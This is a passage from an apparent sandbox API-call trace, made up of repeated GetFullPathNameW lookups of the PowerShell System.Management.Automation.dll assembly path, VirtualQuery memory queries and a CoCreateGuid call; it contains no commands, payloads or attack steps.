lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.558] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.560] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, 
AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.561] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.562] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.562] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: 
lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.563] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.564] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.564] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.564] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: 
lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.565] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.566] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.566] VirtualQuery (in: lpAddress=0xcb740, lpBuffer=0xcc600, dwLength=0x30 | out: lpBuffer=0xcc600*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.567] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.568] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.568] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.568] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: 
lpBuffer=0xcc9c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.569] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd37c877e, Data2=0x9f0e, Data3=0x4ee3, Data4=([0]=0x85, [1]=0x81, [2]=0x55, [3]=0xac, [4]=0x18, [5]=0x48, [6]=0x1f, [7]=0x3e))) returned 0x0 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 
[0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW 
(in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.572] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, 
AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.573] VirtualQuery (in: lpAddress=0xcbb10, lpBuffer=0xcc9d0, dwLength=0x30 | out: lpBuffer=0xcc9d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.573] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.574] VirtualQuery (in: lpAddress=0xcbb00, lpBuffer=0xcc9c0, dwLength=0x30 | out: 
